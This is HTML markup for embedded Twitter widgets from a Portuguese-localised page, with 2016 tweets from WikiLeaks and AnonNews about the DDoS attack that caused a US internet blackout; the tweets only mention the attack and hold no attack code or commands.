url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2072%2072%22%3E%3Cpath%20fill%3D%22none%22%20d%3D%22M0%200h72v72H0z%22%2F%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%2355acee%22%20d%3D%22M68.812%2015.14c-2.348%201.04-4.87%201.744-7.52%202.06%202.704-1.62%204.78-4.186%205.757-7.243-2.53%201.5-5.33%202.592-8.314%203.176C56.35%2010.59%2052.948%209%2049.182%209c-7.23%200-13.092%205.86-13.092%2013.093%200%201.026.118%202.02.338%202.98C25.543%2024.527%2015.9%2019.318%209.44%2011.396c-1.125%201.936-1.77%204.184-1.77%206.58%200%204.543%202.312%208.552%205.824%2010.9-2.146-.07-4.165-.658-5.93-1.64-.002.056-.002.11-.002.163%200%206.345%204.513%2011.638%2010.504%2012.84-1.1.298-2.256.457-3.45.457-.845%200-1.666-.078-2.464-.23%201.667%205.2%206.5%208.985%2012.23%209.09-4.482%203.51-10.13%205.605-16.26%205.605-1.055%200-2.096-.06-3.122-.184%205.794%203.717%2012.676%205.882%2020.067%205.882%2024.083%200%2037.25-19.95%2037.25-37.25%200-.565-.013-1.133-.038-1.693%202.558-1.847%204.778-4.15%206.532-6.774z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 1.25em;" title="">
</div>
</span> Seguir</a></span></div>
<div class="TweetAuthor" data-scribe="component:author" style="line-height: 0; margin-top: 2px; max-width: 100%; overflow: hidden !important; text-overflow: ellipsis !important; word-wrap: normal !important;">
<a aria-label="WikiLeaks (nome de tela: wikileaks)" class="TweetAuthor-link Identity u-linkBlend" data-scribe="element:user_link" href="https://twitter.com/wikileaks" style="background-color: transparent; font-weight: inherit; line-height: 1.2; outline: 0px; text-decoration: inherit;"><span class="TweetAuthor-avatar Identity-avatar" style="background-color: transparent; border-radius: 4px; display: inline-block; height: 36px; left: 0px; overflow: hidden; position: absolute; top: 0px; width: 36px;"><img alt="" class="Avatar" data-scribe="element:avatar" data-src-1x="https://pbs.twimg.com/profile_images/512138307870785536/Fe00yVS2_normal.png" data-src-2x="https://pbs.twimg.com/profile_images/512138307870785536/Fe00yVS2_bigger.png" src="https://pbs.twimg.com/profile_images/512138307870785536/Fe00yVS2_normal.png" style="border: 0px; max-height: 100%; max-width: 100%;" /></span><span class="TweetAuthor-name Identity-name customisable-highlight" data-scribe="element:name" style="font-weight: 700;" title="WikiLeaks">WikiLeaks</span> <span class="TweetAuthor-verifiedBadge" data-scribe="element:verified_badge" style="position: absolute; top: 0px;"><div aria-label="Conta Verificada" class="Icon Icon--verified " role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2064%2072%22%3E%3Cpath%20fill%3D%22none%22%20d%3D%22M0%200h64v72H0z%22%2F%3E%3Cpath%20fill%3D%22%2388c9f9%22%20d%3D%22M3%2037.315c0%204.125%202.162%207.726%205.363%209.624-.056.467-.09.937-.09%201.42%200%206.103%204.72%2011.045%2010.546%2011.045%201.295%200%202.542-.234%203.687-.686C24.22%2062.4%2027.827%2064.93%2032%2064.93c4.174%200%207.782-2.53%209.49-6.213%201.148.45%202.39.685%203.69.685%205.826%200%2010.546-4.94%2010.546-11.045%200-.483-.037-.953-.093-1.42C58.83%2045.04%2061%2041.44%2061%2037.314c0-4.37-2.42-8.15-5.933-9.946.427-1.203.658-2.5.658-3.865%200-6.104-4.72-11.045-10.545-11.045-1.302%200-2.543.232-3.69.688-1.707-3.685-5.315-6.216-9.49-6.216-4.173%200-7.778%202.53-9.492%206.216-1.146-.455-2.393-.688-3.688-.688-5.827%200-10.545%204.94-10.545%2011.045%200%201.364.23%202.662.656%203.864C5.42%2029.163%203%2032.944%203%2037.314z%22%2F%3E%3Cpath%20fill%3D%22%23FFF%22%20d%3D%22M17.87%2039.08l7.015%206.978c.585.582%201.35.873%202.116.873.77%200%201.542-.294%202.127-.883.344-.346%2015.98-15.974%2015.98-15.974%201.172-1.172%201.172-3.07%200-4.243-1.17-1.17-3.07-1.172-4.242%200l-13.87%2013.863-4.892-4.868c-1.174-1.168-3.074-1.164-4.242.01-1.168%201.176-1.163%203.075.01%204.244z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 1.11111em;" title="Conta Verificada">
</div>
<span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">✔</span></span><span class="TweetAuthor-screenName Identity-screenName" data-scribe="element:screen_name" dir="ltr" style="color: #697882; font-size: 14px;" title="@wikileaks">@wikileaks</span></a></div>
</div>
<div class="Tweet-body e-entry-content" data-scribe="component:tweet" style="margin-top: 14px;">
<div class="Tweet-text e-entry-title" dir="ltr" lang="en" style="border: none; cursor: text; direction: ltr; list-style: none; padding: 0px;">
Mr. Assange is still alive and WikiLeaks is still publishing. We ask supporters to stop taking down the US internet. You proved your point.</div>
<div class="Tweet-metadata dateline" style="color: #697882; font-size: 14px; margin-top: 3.2px;">
<a class="u-linkBlend u-url customisable-highlight long-permalink" data-datetime="2016-10-21T21:09:49+0000" data-scribe="element:full_timestamp" href="https://twitter.com/wikileaks/status/789574436219449345" style="background-color: transparent; font-weight: inherit; outline: 0px; text-decoration: inherit;">19: 09 - 21 out 2016</a></div>
<ul aria-label="Ações do Tweet" class="Tweet-actions" data-scribe="component:actions" role="menu" style="border: none; list-style: none; margin: 8.4px 0px 0px; padding: 0px;">
<li class="Tweet-action" style="display: inline-block;"><a class="TweetAction TweetAction--reply web-intent" data-scribe="element:reply" href="https://twitter.com/intent/tweet?in_reply_to=789574436219449345" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Responder" class="Icon Icon--reply TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2062%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M41%2031h-9V19c0-1.14-.647-2.183-1.668-2.688-1.022-.507-2.243-.39-3.15.302l-21%2016C5.438%2033.18%205%2034.064%205%2035s.437%201.82%201.182%202.387l21%2016c.533.405%201.174.613%201.82.613.453%200%20.908-.103%201.33-.312C31.354%2053.183%2032%2052.14%2032%2051V39h9c5.514%200%2010%204.486%2010%2010%200%202.21%201.79%204%204%204s4-1.79%204-4c0-9.925-8.075-18-18-18z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.07639em;" title="Responder">
</div>
</a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--retweet web-intent" data-scribe="element:retweet" href="https://twitter.com/intent/retweet?tweet_id=789574436219449345" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Retweetar" class="Icon Icon--retweet TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2074%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M70.676%2036.644C70.166%2035.636%2069.13%2035%2068%2035h-7V19c0-2.21-1.79-4-4-4H34c-2.21%200-4%201.79-4%204s1.79%204%204%204h18c.552%200%20.998.446%201%20.998V35h-7c-1.13%200-2.165.636-2.676%201.644-.51%201.01-.412%202.22.257%203.13l11%2015C55.148%2055.545%2056.046%2056%2057%2056s1.855-.455%202.42-1.226l11-15c.668-.912.767-2.122.256-3.13zM40%2048H22c-.54%200-.97-.427-.992-.96L21%2036h7c1.13%200%202.166-.636%202.677-1.644.51-1.01.412-2.22-.257-3.13l-11-15C18.854%2015.455%2017.956%2015%2017%2015s-1.854.455-2.42%201.226l-11%2015c-.667.912-.767%202.122-.255%203.13C3.835%2035.365%204.87%2036%206%2036h7l.012%2016.003c.002%202.208%201.792%203.997%204%203.997h22.99c2.208%200%204-1.79%204-4s-1.792-4-4-4z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.28472em;" title="Retweetar">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:retweet_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">46.673</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">46.673 Retweets</span></a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--heart web-intent" data-scribe="element:heart" href="https://twitter.com/intent/like?tweet_id=789574436219449345" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Curtiu" class="Icon Icon--heart TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2054%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M38.723%2012c-7.187%200-11.16%207.306-11.723%208.13-.563-.824-4.496-8.13-11.723-8.13C8.79%2012%203.533%2018.163%203.533%2024.647%203.533%2039.964%2021.89%2055.907%2027%2056c5.11-.093%2023.467-16.036%2023.467-31.353C50.467%2018.163%2045.21%2012%2038.723%2012z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 0.9375em;" title="Curtiu">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:heart_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">32.622</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">32.622 favoritos</span></a></li>
</ul>
</div>
</blockquote>
</div>
</div>
<div class="resize-sensor" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div class="resize-sensor-expand" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 471px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 510px;">
</div>
</div>
<div class="resize-sensor-shrink" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 922.438px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 1000px;">
</div>
</div>
</div>
</div>
</twitterwidget></div>
<h2 style="box-sizing: border-box; color: black; font-size: 28px; line-height: 52px; margin: 52px 0px 0px;">
Twitter</h2>
<div align="center" style="box-sizing: border-box;">
<twitterwidget class="twitter-tweet twitter-tweet-rendered" data-tweet-id="789568182784712704" id="twitter-widget-1" style="box-sizing: border-box; display: block; margin-bottom: 10px; margin-top: 10px; max-width: 100%; min-width: 220px; position: static; transform: rotate(0deg); visibility: visible; width: 500px;"><div class="SandboxRoot env-bp-350" data-twitter-event-id="1" style="background: 0px 0px; color: #1c2022; direction: ltr; font-family: Helvetica, Roboto, 'Segoe UI', Calibri, sans-serif; font-stretch: normal; line-height: 1.4; position: relative; text-align: left; white-space: initial;">
<div class="EmbeddedTweet EmbeddedTweet--mediaForward media-forward js-clickToOpenTarget js-tweetIdInfo" data-click-to-open-target="https://twitter.com/4n0nc47/status/789568182784712704" data-dt-abbr="%{number}%{symbol}" data-dt-am="AM" data-dt-full="%{hours24}: %{minutes} - %{day} %{month} %{year} " data-dt-h="h" data-dt-hour="hora" data-dt-hours="horas" data-dt-long="%{day} %{month} %{year}" data-dt-m="m" data-dt-minute="minuto" data-dt-minutes="minutos" data-dt-months="jan|fev|mar|abr|maio|jun|jul|ago|set|out|nov|dez" data-dt-now="agora" data-dt-pm="PM" data-dt-s="s" data-dt-second="segundo" data-dt-seconds="segundos" data-dt-short="%{day} %{month}" data-iframe-title="Tweet do Twitter" data-scribe="page:tweet" data-tweet-id="789568182784712704" data-twitter-event-id="6" id="twitter-widget-1" lang="pt" style="border-radius: 4px; border: 0px; cursor: pointer; max-width: 520px; overflow: hidden;">
<article class="MediaCard
MediaCard--mediaForward
customisable-border" data-scribe="component:card" dir="ltr"><div class="MediaCard-media" style="background-color: #f5f8fa; overflow: hidden; position: relative; width: 500px;">
<a class="MediaCard-borderOverlay" href="https://twitter.com/engadget/status/789567129427251200/photo/1" role="presentation" style="background-color: transparent; border-radius: 4px 4px 0px 0px; border: 1px solid rgba(225, 232, 237, 0.74902); box-sizing: border-box; color: #2b7bb9; height: 262.5px; left: 0px; outline: 0px; position: absolute; text-decoration: none; top: 0px; width: 500px; z-index: 10;" tabindex="-1" title="Ver imagem no Twitter"><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">Ver imagem no Twitter</span></a><div class="MediaCard-widthConstraint js-cspForcedStyle" data-style="max-width: 1200px" style="margin: 0px auto; max-width: 1200px;">
<div class="MediaCard-mediaContainer js-cspForcedStyle" data-style="padding-bottom: 52.5000%" style="padding-bottom: 262.5px; position: relative;">
<a class="MediaCard-mediaAsset
NaturalImage
" data-scribe="element:photo" href="https://twitter.com/engadget/status/789567129427251200/photo/1" style="background-color: white; color: #2b7bb9; display: block; height: 262.5px; left: 0px; line-height: 0; outline: 0px; position: absolute; text-decoration: none; top: 0px; transition: opacity 0.5s; width: 500px;"><img alt="Ver imagem no Twitter" class="NaturalImage-image" data-srcset="https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUbHkKWIAExrEU.jpg%3Alarge 1200w,https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUbHkKWIAExrEU.jpg 1200w,https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUbHkKWIAExrEU.jpg%3Asmall 680w" height="630" src="https://pbs.twimg.com/media/CvUbHkKWIAExrEU.jpg:small" style="border: 0px; height: auto; line-height: 0; max-height: 100%; max-width: 100%;" title="Ver imagem no Twitter" width="1200" /></a></div>
</div>
</div>
</article><div class="EmbeddedTweet-tweet" style="border-color: rgb(225, 232, 237); border-radius: 0px 0px 4px 4px; border-style: solid; border-width: 0px 1px 1px; padding: 14.4px 20px 11.6px;">
<blockquote cite="https://twitter.com/4n0nc47/status/789568182784712704" class="Tweet h-entry js-tweetIdInfo subject expanded
is-deciderHtmlWhitespace" data-scribe="section:subject" data-tweet-id="789568182784712704" style="border: none; list-style: none; margin: 0px; padding: 0px;">
<div class="Tweet-header u-cf" style="padding-left: 45px; position: relative; white-space: nowrap;">
<div class="Tweet-brand u-floatRight" style="float: right !important; position: relative; z-index: 1;">
<span class="u-hiddenInNarrowEnv"><a class="FollowButton follow-button profile" data-scribe="component:followbutton" href="https://twitter.com/4n0nc47" role="button" style="border-radius: 4px; border: 1px solid rgb(85, 172, 238); color: #55acee; display: inline-block; font-size: 14px; font-weight: 700; line-height: 1; outline: 0px; padding: 5.5px 13px 6.5px 11.5px; text-decoration: none;" title="Siga AnonNews #SLY 🌐 no Twitter"><span class="FollowButton-bird" style="display: inline-block; position: relative; top: 1px;"><div aria-label="" class="Icon Icon--twitter " role="presentation" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2072%2072%22%3E%3Cpath%20fill%3D%22none%22%20d%3D%22M0%200h72v72H0z%22%2F%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%2355acee%22%20d%3D%22M68.812%2015.14c-2.348%201.04-4.87%201.744-7.52%202.06%202.704-1.62%204.78-4.186%205.757-7.243-2.53%201.5-5.33%202.592-8.314%203.176C56.35%2010.59%2052.948%209%2049.182%209c-7.23%200-13.092%205.86-13.092%2013.093%200%201.026.118%202.02.338%202.98C25.543%2024.527%2015.9%2019.318%209.44%2011.396c-1.125%201.936-1.77%204.184-1.77%206.58%200%204.543%202.312%208.552%205.824%2010.9-2.146-.07-4.165-.658-5.93-1.64-.002.056-.002.11-.002.163%200%206.345%204.513%2011.638%2010.504%2012.84-1.1.298-2.256.457-3.45.457-.845%200-1.666-.078-2.464-.23%201.667%205.2%206.5%208.985%2012.23%209.09-4.482%203.51-10.13%205.605-16.26%205.605-1.055%200-2.096-.06-3.122-.184%205.794%203.717%2012.676%205.882%2020.067%205.882%2024.083%200%2037.25-19.95%2037.25-37.25%200-.565-.013-1.133-.038-1.693%202.558-1.847%204.778-4.15%206.532-6.774z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 1.25em;" title="">
</div>
</span> Seguir</a></span></div>
<div class="TweetAuthor" data-scribe="component:author" style="line-height: 0; margin-top: 2px; max-width: 100%; overflow: hidden !important; text-overflow: ellipsis !important; word-wrap: normal !important;">
<a aria-label="AnonNews #SLY 🌐 (nome de tela: 4n0nc47)" class="TweetAuthor-link Identity u-linkBlend" data-scribe="element:user_link" href="https://twitter.com/4n0nc47" style="background-color: transparent; font-weight: inherit; line-height: 1.2; outline: 0px; text-decoration: inherit;"><span class="TweetAuthor-avatar Identity-avatar" style="background-color: transparent; border-radius: 4px; display: inline-block; height: 36px; left: 0px; overflow: hidden; position: absolute; top: 0px; width: 36px;"><img alt="" class="Avatar" data-scribe="element:avatar" data-src-1x="https://pbs.twimg.com/profile_images/768910500411215872/I5KwItO1_normal.jpg" data-src-2x="https://pbs.twimg.com/profile_images/768910500411215872/I5KwItO1_bigger.jpg" src="https://pbs.twimg.com/profile_images/768910500411215872/I5KwItO1_normal.jpg" style="border: 0px; max-height: 100%; max-width: 100%;" /></span><span class="TweetAuthor-name Identity-name customisable-highlight" data-scribe="element:name" style="font-weight: 700;" title="AnonNews #SLY 🌐">AnonNews #SLY 🌐</span> <span class="TweetAuthor-screenName Identity-screenName" data-scribe="element:screen_name" dir="ltr" style="color: #697882; font-size: 14px;" title="@4n0nc47">@4n0nc47</span></a></div>
</div>
<div class="Tweet-body e-entry-content" data-scribe="component:tweet" style="margin-top: 14px;">
<div class="Tweet-text e-entry-title" dir="ltr" lang="en" style="border: none; cursor: text; direction: ltr; list-style: none; padding: 0px;">
Blame the Internet of Things for today's web blackout <a class="PrettyLink hashtag customisable" data-query-source="hashtag_click" data-scribe="element:hashtag" dir="ltr" href="https://twitter.com/hashtag/DDoS?src=hash" rel="tag" style="background-color: transparent; color: #2b7bb9; outline: 0px; text-decoration: none;"><span class="PrettyLink-prefix">#</span><span class="PrettyLink-value">DDoS</span></a>Attack <a class="link customisable" data-expanded-url="http://engt.co/2f03yCo" data-scribe="element:url" dir="ltr" href="https://t.co/ebozk6Wv9P" rel="nofollow" style="background-color: transparent; color: #2b7bb9; outline: 0px; text-decoration: none;" target="_blank" title="http://engt.co/2f03yCo"><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">http://</span>engt.co/2f03yCo<span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;"> </span></a></div>
<div class="Tweet-metadata dateline" style="color: #697882; font-size: 14px; margin-top: 3.2px;">
<a class="u-linkBlend u-url customisable-highlight long-permalink" data-datetime="2016-10-21T20:44:58+0000" data-scribe="element:full_timestamp" href="https://twitter.com/4n0nc47/status/789568182784712704" style="background-color: transparent; font-weight: inherit; outline: 0px; text-decoration: inherit;">18: 44 - 21 out 2016</a></div>
<ul aria-label="Ações do Tweet" class="Tweet-actions" data-scribe="component:actions" role="menu" style="border: none; list-style: none; margin: 8.4px 0px 0px; padding: 0px;">
<li class="Tweet-action" style="display: inline-block;"><a class="TweetAction TweetAction--reply web-intent" data-scribe="element:reply" href="https://twitter.com/intent/tweet?in_reply_to=789568182784712704" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Responder" class="Icon Icon--reply TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2062%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M41%2031h-9V19c0-1.14-.647-2.183-1.668-2.688-1.022-.507-2.243-.39-3.15.302l-21%2016C5.438%2033.18%205%2034.064%205%2035s.437%201.82%201.182%202.387l21%2016c.533.405%201.174.613%201.82.613.453%200%20.908-.103%201.33-.312C31.354%2053.183%2032%2052.14%2032%2051V39h9c5.514%200%2010%204.486%2010%2010%200%202.21%201.79%204%204%204s4-1.79%204-4c0-9.925-8.075-18-18-18z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.07639em;" title="Responder">
</div>
</a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--retweet web-intent" data-scribe="element:retweet" href="https://twitter.com/intent/retweet?tweet_id=789568182784712704" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Retweetar" class="Icon Icon--retweet TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2074%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M70.676%2036.644C70.166%2035.636%2069.13%2035%2068%2035h-7V19c0-2.21-1.79-4-4-4H34c-2.21%200-4%201.79-4%204s1.79%204%204%204h18c.552%200%20.998.446%201%20.998V35h-7c-1.13%200-2.165.636-2.676%201.644-.51%201.01-.412%202.22.257%203.13l11%2015C55.148%2055.545%2056.046%2056%2057%2056s1.855-.455%202.42-1.226l11-15c.668-.912.767-2.122.256-3.13zM40%2048H22c-.54%200-.97-.427-.992-.96L21%2036h7c1.13%200%202.166-.636%202.677-1.644.51-1.01.412-2.22-.257-3.13l-11-15C18.854%2015.455%2017.956%2015%2017%2015s-1.854.455-2.42%201.226l-11%2015c-.667.912-.767%202.122-.255%203.13C3.835%2035.365%204.87%2036%206%2036h7l.012%2016.003c.002%202.208%201.792%203.997%204%203.997h22.99c2.208%200%204-1.79%204-4s-1.792-4-4-4z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.28472em;" title="Retweetar">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:retweet_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">18</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">18 Retweets</span></a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--heart web-intent" data-scribe="element:heart" href="https://twitter.com/intent/like?tweet_id=789568182784712704" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Curtiu" class="Icon Icon--heart TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2054%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M38.723%2012c-7.187%200-11.16%207.306-11.723%208.13-.563-.824-4.496-8.13-11.723-8.13C8.79%2012%203.533%2018.163%203.533%2024.647%203.533%2039.964%2021.89%2055.907%2027%2056c5.11-.093%2023.467-16.036%2023.467-31.353C50.467%2018.163%2045.21%2012%2038.723%2012z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 0.9375em;" title="Curtiu">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:heart_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">13</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">13 favoritos</span></a></li>
</ul>
</div>
</blockquote>
</div>
</div>
<div class="resize-sensor" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div class="resize-sensor-expand" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 450px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 510px;">
</div>
</div>
<div class="resize-sensor-shrink" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 880.125px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 1000px;">
</div>
</div>
</div>
</div>
</twitterwidget></div>
<div align="center" style="box-sizing: border-box;">
<twitterwidget class="twitter-tweet twitter-tweet-rendered" data-tweet-id="789569238868590592" id="twitter-widget-2" style="box-sizing: border-box; display: block; margin-bottom: 10px; margin-top: 10px; max-width: 100%; min-width: 220px; position: static; transform: rotate(0deg); visibility: visible; width: 500px;"><div class="SandboxRoot env-bp-350" data-twitter-event-id="2" style="background: 0px 0px; color: #1c2022; direction: ltr; font-family: Helvetica, Roboto, 'Segoe UI', Calibri, sans-serif; font-stretch: normal; line-height: 1.4; position: relative; text-align: left; white-space: initial;">
<div class="EmbeddedTweet js-clickToOpenTarget" data-click-to-open-target="https://twitter.com/pzf/status/789569238868590592" data-dt-abbr="%{number}%{symbol}" data-dt-am="AM" data-dt-full="%{hours24}: %{minutes} - %{day} %{month} %{year} " data-dt-h="h" data-dt-hour="hora" data-dt-hours="horas" data-dt-long="%{day} %{month} %{year}" data-dt-m="m" data-dt-minute="minuto" data-dt-minutes="minutos" data-dt-months="jan|fev|mar|abr|maio|jun|jul|ago|set|out|nov|dez" data-dt-now="agora" data-dt-pm="PM" data-dt-s="s" data-dt-second="segundo" data-dt-seconds="segundos" data-dt-short="%{day} %{month}" data-iframe-title="Tweet do Twitter" data-scribe="page:tweet" data-twitter-event-id="7" id="twitter-widget-2" lang="pt" style="border-radius: 4px; border: 1px solid rgb(225, 232, 237); cursor: pointer; max-width: 520px; overflow: hidden;">
<div class="EmbeddedTweet-tweet" style="padding: 20px 20px 11.6px;">
<blockquote cite="https://twitter.com/pzf/status/789569238868590592" class="Tweet h-entry js-tweetIdInfo subject expanded
is-deciderHtmlWhitespace" data-scribe="section:subject" data-tweet-id="789569238868590592" style="border: none; list-style: none; margin: 0px; padding: 0px;">
<div class="Tweet-header u-cf" style="padding-left: 45px; position: relative; white-space: nowrap;">
<div class="Tweet-brand u-floatRight" style="float: right !important; position: relative; z-index: 1;">
<span class="u-hiddenInNarrowEnv"><a class="FollowButton follow-button profile" data-scribe="component:followbutton" href="https://twitter.com/pzf" role="button" style="border-radius: 4px; border: 1px solid rgb(85, 172, 238); color: #55acee; display: inline-block; font-size: 14px; font-weight: 700; line-height: 1; outline: 0px; padding: 5.5px 13px 6.5px 11.5px; text-decoration: none;" title="Siga Breaking News Feed no Twitter"><span class="FollowButton-bird" style="display: inline-block; position: relative; top: 1px;"><div aria-label="" class="Icon Icon--twitter " role="presentation" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2072%2072%22%3E%3Cpath%20fill%3D%22none%22%20d%3D%22M0%200h72v72H0z%22%2F%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%2355acee%22%20d%3D%22M68.812%2015.14c-2.348%201.04-4.87%201.744-7.52%202.06%202.704-1.62%204.78-4.186%205.757-7.243-2.53%201.5-5.33%202.592-8.314%203.176C56.35%2010.59%2052.948%209%2049.182%209c-7.23%200-13.092%205.86-13.092%2013.093%200%201.026.118%202.02.338%202.98C25.543%2024.527%2015.9%2019.318%209.44%2011.396c-1.125%201.936-1.77%204.184-1.77%206.58%200%204.543%202.312%208.552%205.824%2010.9-2.146-.07-4.165-.658-5.93-1.64-.002.056-.002.11-.002.163%200%206.345%204.513%2011.638%2010.504%2012.84-1.1.298-2.256.457-3.45.457-.845%200-1.666-.078-2.464-.23%201.667%205.2%206.5%208.985%2012.23%209.09-4.482%203.51-10.13%205.605-16.26%205.605-1.055%200-2.096-.06-3.122-.184%205.794%203.717%2012.676%205.882%2020.067%205.882%2024.083%200%2037.25-19.95%2037.25-37.25%200-.565-.013-1.133-.038-1.693%202.558-1.847%204.778-4.15%206.532-6.774z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 1.25em;" title="">
</div>
</span> Seguir</a></span></div>
